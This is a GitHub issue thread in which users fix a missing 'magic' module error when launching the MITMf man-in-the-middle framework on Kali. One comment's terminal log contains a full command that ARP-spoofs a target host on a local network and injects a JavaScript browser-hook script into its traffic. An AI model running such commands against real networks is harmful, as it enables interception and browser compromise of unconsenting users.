### ISSUE TITLE
Unable to launch Kali

### ISSUE THREAD

**Issue by ownmask** [byt3bl33d3r/MITMf#419]
I get this error on the console.

Traceback (most recent call last):
  File "mitmf.py", line 36, in <module>
    from plugins import *
  File "/root/Desktop/MITMf/plugins/filepwn.py", line 70, in <module>
    import magic
ImportError: No module named magic

**Comment by ritiek** [comment]
Did you follow the [installation instructions](https://github.com/byt3bl33d3r/MITMf/wiki/Installation)?

**Comment by mike-north** [comment]
FWIW I ran into the same issue. For some reason running 
```
pip install requirements.txt
```
a second time seemed to resolve this

<details>
  <summary>Click here to see my terminal output</summary>
  <pre>
root@black:~# cd MITMf/
root@black:~/MITMf# python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.0.1 --target 192.168.0.20 --inject --js-url http://127.0.0.1:3000/hook.js
Traceback (most recent call last):
  File "mitmf.py", line 36, in <module>
    from plugins import *
  File "/root/MITMf/plugins/filepwn.py", line 70, in <module>
    import magic
ImportError: No module named magic
root@black:~/MITMf# pip install -r requirements.txt

Collecting git+git://github.com/kti/python-netfilterqueue (from -r requirements.txt (line 1))
  Cloning git://github.com/kti/python-netfilterqueue to /tmp/pip-mWatZy-build
Requirement already satisfied: pyinotify in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 2))
Requirement already satisfied: pycrypto in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 3))
Requirement already satisfied: pyasn1 in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 4))
Requirement already satisfied: cryptography in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 5))
Requirement already satisfied: Pillow in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 6))
Requirement already satisfied: netaddr in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 7))
Requirement already satisfied: scapy in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 8))
Collecting dnslib (from -r requirements.txt (line 9))
Requirement already satisfied: Twisted in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 10))
Requirement already satisfied: lxml in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 11))
Requirement already satisfied: pefile in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 12))
Requirement already satisfied: ipy in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 13))
Collecting user_agents (from -r requirements.txt (line 14))
  Using cached user_agents-1.1.0-py2-none-any.whl
Requirement already satisfied: pyopenssl in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 15))
Requirement already satisfied: service_identity in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 16))
Requirement already satisfied: configobj in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 17))
Requirement already satisfied: Flask in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 18))
Requirement already satisfied: dnspython in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 19))
Requirement already satisfied: beautifulsoup4 in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 20))
Requirement already satisfied: capstone in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 21))
Collecting python-magic (from -r requirements.txt (line 22))
  Using cached python_magic-0.4.13-py2.py3-none-any.whl
Requirement already satisfied: msgpack-python in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 23))
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 24))
Collecting pypcap (from -r requirements.txt (line 25))
Requirement already satisfied: chardet in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 26))
Collecting ua-parser>=0.4.1 (from user_agents->-r requirements.txt (line 14))
  Using cached ua_parser-0.7.3-py2.py3-none-any.whl
Requirement already satisfied: six in /usr/lib/python2.7/dist-packages (from configobj->-r requirements.txt (line 17))
Installing collected packages: dnslib, ua-parser, user-agents, python-magic, pypcap, NetfilterQueue
  Running setup.py install for NetfilterQueue ... done
Successfully installed NetfilterQueue-0.8.1 dnslib-0.9.7 pypcap-1.1.6 python-magic-0.4.13 ua-parser-0.7.3 user-agents-1.1.0
root@black:~/MITMf# 
root@black:~/MITMf# pip install magic
Collecting magic
  Could not find a version that satisfies the requirement magic (from versions: )
No matching distribution found for magic
root@black:~/MITMf# pip install python-magic
Requirement already satisfied: python-magic in /usr/local/lib/python2.7/dist-packages
root@black:~/MITMf# python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.0.1 --target 192.168.0.20 --inject --js-url http://127.0.0.1:3000/hook.js
                                                    
 __  __   ___   .--.          __  __   ___              
|  |/  `.'   `. |__|         |  |/  `.'   `.      _.._  
|   .-.  .-.   '.--.     .|  |   .-.  .-.   '   .' .._| 
|  |  |  |  |  ||  |   .' |_ |  |  |  |  |  |   | '     
|  |  |  |  |  ||  | .'     ||  |  |  |  |  | __| |__   
|  |  |  |  |  ||  |'--.  .-'|  |  |  |  |  ||__   __|  
|  |  |  |  |  ||  |   |  |  |  |  |  |  |  |   | |     
|__|  |__|  |__||__|   |  |  |__|  |__|  |__|   | |     
                       |  '.'                   | |     
                       |   /                    | |     
                       `'-'                     |_|

  </pre>
</details>

**Comment by minsectek** [comment]
To be honest, the installation instructions seldom work for most people. Provided you're on Kali, just run `apt-get install mitmf`.
